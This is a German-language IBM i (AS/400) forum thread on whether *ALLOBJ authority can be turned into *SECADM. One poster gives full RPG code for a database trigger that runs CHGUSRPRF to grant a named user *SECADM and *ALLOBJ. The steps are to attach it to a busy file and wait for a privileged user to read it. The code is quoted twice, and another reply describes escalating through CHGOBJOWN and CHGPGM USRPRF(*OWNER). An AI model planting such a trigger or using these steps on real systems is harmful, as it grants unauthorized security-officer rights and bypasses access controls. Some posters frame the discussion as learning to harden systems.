-
Zitat von Fuerchau
Aber, wie Dieter schon schreibt und ich schon vielfach nachgewiesen habe, mit *ALLOBJ kann ich mir *SECADM beschaffen.
aha und wie ? würde mich echt interessieren ob man *secadm rechte beschaffen kann ...
-
Mit Gedult und Spucke
spontan fällt mir da folgendes ein:
1.) Schreibe ein kleines Triggerprogramm
PHP-Code:
h dftactgrp(*no) bnddir('QC2LE')
h datfmt(*dmy.) timfmt(*hms:) datedit(*dmy.) decedit('0,') debug(*yes)
d True c *On
d False c *Off
d parm1 ds 32768
d parm2 ds
d system pr 10i 0 extproc('system')
d * value options(*string)
c *Entry PList
c parm1 parm parm1
c parm2 parm parm2
c Eval *inlr = True
c CallP System( 'chgusrprf usrprf(MyUser) ' +
c ' spcaut(*Secadm *AllObj)' )
2.) Trigger auf eine Datei klemmen die häufig benötigt, aber eben auch mal frei ist um den trigger ran zu tackern. AUf die Read-Op reicht ja
3.) Warten bis ein User mit ausreichend Berechtigung auf der Datei vorbei schaut.
Und schon hat man *SECADM
Gruß
Ronald
-
Und wenn Du dann noch Glück hast und täglich ein IPL stattfindet, dann hast überhaupt kein Problem den richtigen Zeitpunkt zu erwischen
Andreas
Ein AS/400 Dinosaurier since 1989
-
@nico1964
kannst du mir da mal mehr Infos dazu geben ?
Ist halt schon gut zu Wissen welche Tricks es gibt um sein System sicherer zu machen .
Also das mit *allobj hab ich gefressen
-
... dazu braucht es nicht mal *ALLOBJ...
und auf den mesiten Maschinen wird nicht einmal das Audit Journal eingesetzt...
Zitat von malzusrex
Mit Gedult und Spucke
spontan fällt mir da folgendes ein:
1.) Schreibe ein kleines Triggerprogramm
PHP-Code:
h dftactgrp(*no) bnddir('QC2LE')
h datfmt(*dmy.) timfmt(*hms:) datedit(*dmy.) decedit('0,') debug(*yes)
d True c *On
d False c *Off
d parm1 ds 32768
d parm2 ds
d system pr 10i 0 extproc('system')
d * value options(*string)
c *Entry PList
c parm1 parm parm1
c parm2 parm parm2
c Eval *inlr = True
c CallP System( 'chgusrprf usrprf(MyUser) ' +
c ' spcaut(*Secadm *AllObj)' )
2.) Trigger auf eine Datei klemmen die häufig benötigt, aber eben auch mal frei ist um den trigger ran zu tackern. AUf die Read-Op reicht ja
3.) Warten bis ein User mit ausreichend Berechtigung auf der Datei vorbei schaut.
Und schon hat man *SECADM
Gruß
Ronald
-
Sobald ich *ALLOBJ habe kann ich mit ein wenig Energie mir SECADM geben.
Auch ohne PDM o.ä. kann ich per SQL (z.B. OpsNav, u.v.a.) ein CLP obiger Art schreiben.
Immerhin kann man ja auch QCMDEXC aus CLP aufrufen, da verhindert der Compiler eben nichts!
Mittels *ALLOBJ kann ich dem QSECOFR Objekte zuordnen CHGOBJOWN und dann per CHGPGM ... USRPRF(*OWNER) alles machen, was der QSECOFR darf, also auch einen CHGUSRPRF.
Similar Threads
-
By dschroeder in forum NEWSboard Programmierung
Antworten: 3
Letzter Beitrag: 20-06-14, 11:14
-
By Kirsten Steer in forum Archiv NEWSblibs
Antworten: 0
Letzter Beitrag: 05-06-02, 11:22
-
By mott in forum IBM i Hauptforum
Antworten: 7
Letzter Beitrag: 02-05-02, 13:08
-
By SBaum in forum IBM i Hauptforum
Antworten: 4
Letzter Beitrag: 28-11-01, 11:55
-
By RM Haaßengier in forum Archiv NEWSboard Events
Antworten: 0
Letzter Beitrag: 17-09-01, 17:38
Berechtigungen
- Neue Themen erstellen: Nein
- Themen beantworten: Nein
- You may not post attachments
- You may not edit your posts
-
Foren-Regeln
|
Erweiterte Foren Suche
Google Foren Suche
Forum & Artikel Update eMail
AS/400 / IBM i
Server Expert Gruppen
Unternehmens IT
|
Kategorien online Artikel
- Big Data, Analytics, BI, MIS
- Cloud, Social Media, Devices
- DMS, Archivierung, Druck
- ERP + Add-ons, Business Software
- Hochverfügbarkeit
- Human Resources, Personal
- IBM Announcements
- IT-Karikaturen
- Leitartikel
- Load`n`go
- Messen, Veranstaltungen
- NEWSolutions Dossiers
- Programmierung
- Security
- Software Development + Change Mgmt.
- Solutions & Provider
- Speicher – Storage
- Strategische Berichte
- Systemmanagement
- Tools, Hot-Tips
Auf dem Laufenden bleiben
|
Bookmarks